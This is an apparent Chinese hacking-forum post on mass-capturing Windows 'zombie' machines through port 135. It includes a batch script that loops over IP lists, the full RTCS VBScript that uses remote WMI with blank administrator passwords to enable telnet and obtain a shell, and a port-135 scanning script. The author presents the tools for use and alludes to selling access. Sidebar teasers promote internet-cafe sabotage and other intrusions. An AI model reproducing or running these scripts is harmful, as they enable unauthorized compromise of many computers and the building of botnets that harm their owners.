经典入侵:利用常见的135端口批量抓肉鸡

所属分类: 网络安全 / 黑客入侵 阅读数: 105
收藏 0 赞 0 分享
关于135抓肉鸡的分析最近好象135搞的很火热 看见有人也把那个批量抓135肉鸡的工具发出来了我也就说下把 反正俺也不早就不用那鸟东西了 上次看了那个也说一天抓1000只肉鸡 由于我是开快进看的 没仔细的看 我以为他是自动登陆telnet 所以我就晕死了 应为自动登陆telnet我以前研究很多 我由于我批处理我学的不怎么样也就会点皮毛就加了他 结果他一上来就开口批量开23卖2000RMB 人品啊 我倒 那鸟东西不清楚大家知道作者不 那是02年安全焦点的大哥写的 我有RT整个全套代码的 一万年前我就知道怎么批量开23了 不废话了先说其他的把 后来一位大哥把他的RT整套脚本整合写了一个RCMD1。05这个是目前的最新版好象 需要解决的问题我详细的说一下把 首先要解决的就是批量开23了 rtcs脚本(百度一下有下的找不到就是搜索水品问题了) 里面的代码如果懂VBS的朋友去看下 就是先用VBS远程连接主机的wmi服务 然后剩下的是开启和过认证部分 以前有一篇文章分析过说是作者写的有一个小BUG 就是如果原来已经开启的话可以直接转到退出的 这里不多说这个了 for /f "delims= " %%i in (nt.txt) do del %%i.bat
for /f "delims= " %%i in (nt.txt) do echo goto start>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo :start>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo cscript rtcs.vbe %%i administrator "" 1 23^|find "shell">>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo if errorlevel=1 goto b>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo if errorlevel=0 goto d>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo :d>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo SecureCRT.EXE %%i&goto exit>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo :b>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo cscript rtcs.vbe %%i administrator "" 1 23^|find "error">>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo if errorlevel=1 goto start>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo if errorlevel=0 goto exit>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo :exit>>%%i.bat
for /f "delims= " %%i in (nt.txt) do echo exit>>%%i.bat
for /f "delims= " %%i in (nt.txt) do start %%i.bat
exit 这个是我以前写的一个批处理 有兴趣的朋友可以看下 其实很简单 外面流传的需要过滤23 我的不需要过滤23 有兴趣的朋友可以看下 代码正确性没测试应为我写过好几个版本现在已经不记得哪个是可以用的了 但是思路很明显的相信大家可以看明白 要解决的问题二 我也尝试了用脚本来实现先telnet ip 然后sendkey 后来发现问题大大的 只能一个一个种植不能实现批量种植 后来朋友给冰冰批量 就是现在大家可以在外面找的版本 他很好的解决了批量登陆和自动种植的问题 调用辅助工具 设置登陆脚本然后自动种植 但是我相信用的朋友一定知道有什么问题 telnet认证是很复杂的 此外容易出现提示丢失脚本的错误 其他的不知道说什么了 我今天上网给朋友搞东西 弄的累的要死 思路不是很清楚 我在总结下把 首先写一个S扫描的BAT然后里面用FOR循环自动整理IP 然后NT过滤 然后调用上面我发的批处理批量开23 然后写一个批处理直接调用辅助工具自动登陆自动种植 效果如何 大家详细的去看动画就知道了 而后来我写的一个版本 就很帅了 嘿嘿 保密中 应为工具是给兄弟群共享的 他们有业务来着 如果我把东西发布了说是会干掉我 怕怕 给会懂VBS的朋友说一下把 引导一下思路 前面的扫描和和NT过滤还是一样的不说了 远程连接wmi大家可以看rtcs的脚本 关键地方就是下面了 难道远程连接到了wmi服务就只有开telnet一条出路吗 貌似wmi功能多多把 具体能干什么去看安焦点rtcs作者02年的文章把 目前我写的脚本和所有的工具打包起来也才70多K 同时开4个服务器一天抓1万只肉鸡 信不信由你 相信大家都知道recton里有一个http种植者的功能把 去找找文章看人家怎么实现的 最近风声很紧有业务的朋友最好小心 最近的通道不是那么安全 这个是rtcs的代码 自己保存成VBS on error resume next
if (lcase(right(wscript.fullname,11))="wscript.exe") then
set objShell=wscript.createObject("wscript.shell")
objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
wscript.quit
end if
if wscript.arguments.count<5 then
usage()
wscript.echo "Not enough parameters."
wscript.quit
end if ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
ntlm=wscript.arguments(3)
port=wscript.arguments(4)
if password=chr(34)&chr(34) then password=NULL
if ntlm<0 or ntlm>2 then
usage()
wscript.echo "The value of NTML is wrong."
wscript.quit
end if usage()
wscript.echo "Conneting "&ipaddress&"...."
set objlocator=createobject("wbemscripting.swbemlocator")
set objswbemservices=objlocator.connectserver(ipaddress,"root/default",username,password)
showerror(err.number) wscript.echo "Setting NTLM="&ntlm&"...."
set objinstance=objswbemservices.get("stdregprov")
set objmethod=objinstance.methods_("SetDWORDvalue")
set objinparam=objmethod.inparameters.spawninstance_()
objinparam.hdefkey=&h80000002
objinparam.ssubkeyname="SOFTWARE\Microsoft\TelnetServer\1.0"
objinparam.svaluename="NTLM"
objinparam.uvalue=ntlm
set objoutparam=objinstance.execmethod_("SetDWORDvalue",objinparam)
showerror(objoutparam.returnvalue) wscript.echo "Setting port="&port&"...."
objinparam.svaluename="TelnetPort"
objinparam.uvalue=port
set objoutparam=objinstance.execmethod_("SetDWORDvalue",objinparam)
showerror(objoutparam.returnvalue) wscript.echo "Querying state of telnet server...."
set objswbemservices=objlocator.connectserver(ipaddress,"root\cimv2",username,password)
set colinstances=objswbemservices.execquery("select * from win32_service where name='tlntsvr'")
for each objinstance in colinstances
if objinstance.startmode="Disabled" then
wscript.echo "Telnet server has been disabled. Now changeing start mode to manual...."
set objmethod=objinstance.methods_("changestartmode")
set objinparam=objmethod.inparameters.spawninstance_()
objinparam.startmode="Manual"
set objoutparam=objinstance.execmethod_("changestartmode",objinparam)
showerror(objoutparam.returnvalue)
end if
wscript.echo "Changeing state...."
if objinstance.started=true then
intstatus=objinstance.stopservice()
showerror(intstatus)
wscript.echo "Target telnet server has been STOP Successfully."
else
intstatus=objinstance.startservice()
showerror(intstatus)
wscript.echo "Target telnet server has been START Successfully!"
wscript.echo "Now, you can try: telnet "&ipaddress&" "&port&", to get a shell."
end if
next function showerror(errornumber)
if errornumber<>0 then
wscript.echo "Error!"
wscript.quit
else
wscript.echo "OK!"
end if
end function function usage()
wscript.echo "************************************************************************"
wscript.echo "RTCS v1.08"
wscript.echo "Remote Telnet Configure Script, by zzzevazzz"
wscript.echo "Welcome to visite www.isgrey.com"
wscript.echo "Usage:"
wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password NTLMAuthor telnetport"
wscript.echo "It will auto change state of target telnet server."
wscript.echo "************************************************************************"
end function 经典吧,呵呵,我觉得,呵呵,管理员要给我加钱啊,呵呵
关于for循环 我解释下 for /f这个这个参数表示对文本操作 tokens表示截取 tokens=1,2表示选取1,2两个部分 eol表示忽略 eol=-表示忽略-开始的行 delims表示分割符 delims=,表示对每行以“,”为分割符号对行进行分割字符 那么我给大家写一个S扫描自动整理IP的批处理把 s.bat setlocal
cls
color A
title 自动抓鸡v1.0
echo ======================================================
echo 自动抓鸡v1.0
echo 作者:hurrytigar
echo QQ:30144942
echo emil:hurrytigar@163.com
echo hacked by hurrytigar
echo ======================================================
del result.txt
del s.txt
for /f "eol= tokens=1,2 delims= " %%i in (ip.txt) do s tcp %%i %%j 135 1000 /save
for /f "eol=- tokens=1 delims= " %%i in (result.txt) do echo %%i>>s1.txt
for /f "eol=P tokens=1 delims= " %%i in (s1.txt) do echo %%i>>s2.txt
for /f "eol=S tokens=1 delims= " %%i in (s2.txt) do echo %%i>>s.txt
del s1.txt
del s2.txt
del Result.txt 扫描那行的FOR循环 for /f "eol= tokens=1,2 delims= " %%i in (ip.txt) do s tcp %%i %%j 135 1000 /save
意思是说 从ip.txt中对每行以空格分割 然后取得分割后的第一部分和第二部分字符 第一个%%i是形参 代替你要取出来的部分 那么后面的2个部分的%%i 和%%j表示取出的两个部分按顺序代替的参数了 后面的几行都是扫描完成的result过滤整理 先忽略以空格 - P S开头的行 然后用echo写入文本来转的 用法 大家把上面的批处理代码保存成 s.bat然后在同一目录建立一个ip.txt的文本 然后把下面的这些复制进IP。TXT里面 (不需要整理 直接全放进去 汉字不需要去掉) 扫描和整理结束以后会有一个S。TXT文本 自己打开看看效果把 ^_^ 忘了说了把s.exe ip.txt和s.bat放在同一目录 好了我闪了.

更多精彩内容其他人还在看

黑客技术讲解 网吧入侵方法大搜罗

首先,我们了解被破坏网吧的客观环境,要了解网吧人员的实地监测等。尤其要注意看有没有闭路电视监控。如果网吧人员对你的个人资料相当熟悉,就住手免的惹麻烦了。部分网吧要出示身份证也不要破坏了,免的惹麻烦。以下破坏方法不分先后,请量力灵活运用若干破坏组合。具体
收藏 0 赞 0 分享

通过Asp入侵Webserver

通过asp入侵web server,窃取文件毁坏系统,这决非耸人听闻... iis的安全性问题 1.iis3/pws的漏洞 我实验过,win98 pws上运行ASP程序,只须在浏览器地址栏内多加一个小数点ASP程序就会被下载下来。IIS3听说也有同样的问题,
收藏 0 赞 0 分享

详尽的IPC$入侵

一 唠叨一下: 网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄. 不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步
收藏 0 赞 0 分享

如何入侵ADSL

这是一位所谓的"黑客"的口述,你不妨看一下,也许你看完后对他的技术性做法不是完全明白,但是你肯定会感到一身冷汗,因为我们现在使用ADSL已经日益广泛,但我们的安全意识还不是很强.听完他的口述希望大家在日后能加强安全防范! 口述: 也许看烂了网上已有的
收藏 0 赞 0 分享

看我来入侵复旦大学(图)

一、师出有名 某日十分无聊,就和X论坛的超级版主wyzhack瞎吹牛,东年西扯的。后来不知道怎么的扯到复旦去了,他提议说不如我们黑掉复旦吧。正好当时也比较清闲,就答应一起看看了,嘿嘿。这次跑去黑复旦纯粹是为了练习技术。 二、战略部署 这次要拿的
收藏 0 赞 0 分享

领土之争——入侵某视讯服务器回忆录

老早就打算写这样一篇文章:能够细致地反映出入侵中攻防的具体内容,我想这比单纯的技术文章有趣的多。有鉴于此,我将尽力完整描述入侵过程中的思考方式。 1.石榴裙下的kk 说实话,就第一次拿到权限而言,没有多少技术含量。我花了N久时间收集KK网络的各种信息,最终
收藏 0 赞 0 分享

黑客攻防实战之对有防火墙网站入侵过程

前几天群里的兄弟给了一个网站,问我可不可以入侵。   一、踩点   ping www.111.com 发现超时,可以是有防火墙或做了策略。再用superscan扫一下,发现开放的端口有很多个,初步估计是软件防火墙。   二、注入   从源文件里搜索关键字asp
收藏 0 赞 0 分享

看看黑客都在偷窥什么!入侵个人电脑揭密(图)

前几天看《南国早报》说一位女孩个人电脑被黑客入侵控制,把裸照发到网上威胁女孩的事。联想到最近网上这样的事挺多的,就想给大家说说怎么防范。 其实现在的网络真的不安全~只要你的电脑连接上网络就存在一定的风险。黑客并不是万能的,他们入侵的电脑都是存在比较严重
收藏 0 赞 0 分享

XSS Phishing - 新式跨站脚本攻击方式(图)

最近跨站脚本漏洞好像比较火,国内的一些比较出名的WEB程序都陆续暴出了跨站脚本漏洞,但是一提到跨站脚本漏洞的攻击方式大家都哑火了,因为在常规的概念中这种漏洞最多是挂网页木马,获取COOKIE之类,属于典型的鸡肋漏洞! 跨站脚本攻击最大的魅力是通过HTML注
收藏 0 赞 0 分享

PHP数据库安全之SQL注入

$offset = $argv[0]; // 注意,没有输入验证!   $query = "SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET $offset;";   $resu
收藏 0 赞 0 分享
查看更多